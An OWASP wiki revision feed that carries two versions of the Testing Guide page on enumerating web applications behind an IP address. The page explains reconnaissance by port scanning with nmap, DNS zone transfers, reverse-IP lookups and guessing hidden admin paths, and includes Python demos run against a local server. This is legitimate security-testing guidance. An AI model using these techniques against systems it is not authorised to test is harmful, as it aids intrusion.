&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test, and no other knowledge. It is arguable that this setting is more typical of a pentest-type engagement, but in any case such an assignment is expected to test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web server configured at this address&amp;quot; or a similar message. &lt;br /&gt;
Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, only some of them, or none at all because you fail to notice them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following, we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications this way, unless you don’t want them to be accessible in a standard way and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (in fact, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no fool-proof way to ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe for finding them. However, a couple of criteria may aid in the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Our first hope is that these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'', we could, for example, do a bit of googling using the ''site'' operator and examine the results of a query for “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a webmail front end might be accessible from a URL such as https://www.example.com/webmail even though it is not referenced anywhere (after all, employees would know where the webmail application is located, and there is no reason to advertise this information to outsiders on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap -P0 -sT -sV -p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output, looking for http or for indications of SSL-wrapped services (which should be probed to confirm that they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – beyond what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited use, given the fact that zone transfer requests are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name server serving ''x.y.z.t''. In practice, matters get complicated because there could be several such servers. You may know a name server because it was given as part of the target to be assessed (say, ''dns.example.com''). You may query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, get back a list of the DNS entries for the domain ''example.com''. This will include the obvious ''www.example.com'' as well as the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
If you don’t know a name server, you may look up the ''whois'' information for the given IP address, contact the name servers listed there, and request a zone transfer as described above.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name mappings, which is not guaranteed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services which allow you to perform name-based searches on DNS. One such service is ''Netcraft Search DNS'', available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11829</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11829"/>
				<updated>2006-11-06T08:58:18Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control and/or access to data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a particular web server without any reference from the main website: this is typical of internal and/or extranet websites, which may be misconfigured or left out of date due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Moreover, many applications use common paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, only some of them, or none at all - because you don't notice them, or you notice only some of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying the web applications hosted on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should be as comprehensive in scope as possible, i.e. it should first identify all the applications accessible through the given target. In the following, we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no reason to publish web applications in this way, unless you deliberately do not want them to be accessible in a standard way and are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
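A quick way to check such candidate base URLs is to request each one and keep those that answer meaningfully. The following Python sketch demonstrates the idea against a throwaway local server standing in for ''www.example.com'' (the paths and responses are invented for the example):&lt;br /&gt;

```python
# Sketch: probing candidate base URLs. A local throwaway server stands in
# for the real target; only /url2 hosts an "application" here.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/url2":          # the one "hidden" application
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"hidden application")
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args):         # keep the demo quiet
        pass

server = HTTPServer(("127.0.0.1", 0), Handler)   # port 0 = any free port
threading.Thread(target=server.serve_forever, daemon=True).start()
port = server.server_address[1]

found = []
for path in ["/url1", "/url2", "/url3"]:
    conn = http.client.HTTPConnection("127.0.0.1", port)
    conn.request("GET", path)
    if conn.getresponse().status == 200:
        found.append(path)
    conn.close()
server.shutdown()
print(found)  # ['/url2']
```

Against a real target, the same loop would iterate over a list of guessed paths; anything other than an error page is worth a closer look.&lt;br /&gt;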
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying which virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
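To make the mechanism concrete, here is a minimal Python sketch (standard library only) in which a single local listener serves different content depending on the ''Host:'' header it receives – the essence of virtual hosting. The host names are the illustrative ones from the text:&lt;br /&gt;

```python
# Sketch: one listener, different content per Host header - the mechanism
# behind virtual hosts. Host names are illustrative placeholders.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

SITES = {
    "www.example.com": b"corporate site",
    "webmail.example.com": b"webmail front end",
}

class VHostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        body = SITES.get(host, b"No web server configured at this address")
        self.send_response(200)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

server = HTTPServer(("127.0.0.1", 0), VHostHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
port = server.server_address[1]

def fetch(host):
    """Request / from the listener, overriding only the Host header."""
    conn = http.client.HTTPConnection("127.0.0.1", port)
    conn.request("GET", "/", headers={"Host": host})
    body = conn.getresponse().read()
    conn.close()
    return body

results = {h: fetch(h) for h in ("www.example.com", "webmail.example.com")}
server.shutdown()
print(results)
```

The same IP and port yield different applications purely as a function of the symbolic name used, which is why enumerating names is essential.&lt;br /&gt;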
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of web applications published at non-standard URLs. Being non-standard, there is no magic recipe for finding them. However, there are a couple of techniques which may aid in the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Our first hope is that these applications are referenced by other web pages; if so, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examine the result of a query for “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to advertise it to outsiders on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will probe, with a TCP connect scan, all TCP ports on IP ''192.168.1.100'' and will try to determine which services are bound to them (only the ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap -P0 -sT -sV -p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is then sufficient to examine the output and look for http or an indication of SSL-wrapped services (which should be probed to confirm that they are https).&lt;br /&gt;
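That examination can also be done programmatically by picking the http[s] candidates out of the service lines. A short Python sketch; the sample nmap output below is fabricated for illustration:&lt;br /&gt;

```python
# Sketch: extract http[s] candidates from `nmap -sV` service lines.
# The sample output is fabricated for illustration purposes.
import re

SAMPLE = """\
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 4.3
80/tcp    open  http     Apache httpd 2.2.3
443/tcp   open  ssl/http Apache httpd 2.2.3
20000/tcp open  http     Jetty 6.1.1
"""

def web_ports(nmap_output):
    """Return (port, service) pairs whose detected service looks like http."""
    hits = []
    for line in nmap_output.splitlines():
        m = re.match(r"(\d+)/tcp\s+open\s+(\S+)", line)
        if m and "http" in m.group(2):
            hits.append((int(m.group(1)), m.group(2)))
    return hits

print(web_ports(SAMPLE))  # [(80, 'http'), (443, 'ssl/http'), (20000, 'http')]
```

The ''ssl/http'' entry is the kind of SSL-wrapped service mentioned above, which should then be probed to confirm it is https.&lt;br /&gt;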
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – in addition to what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, since zone transfer requests are largely refused by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name server serving ''x.y.z.t''. Actually, matters get complicated because there could be many such servers. Maybe you know a name server because it was given as part of the target to be assessed (let it be ''dns.example.com''). You may query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, you may get back a list of the DNS entries for domain ''example.com''. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
If you don’t know a name server, you may look up ''whois'' information about the given IP address, and try to contact the name servers listed by whois, and request a zone transfer as said before.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name mappings, which is not guaranteed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow you to perform name-based searches on DNS. One such service is ''Netcraft Search DNS'', available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
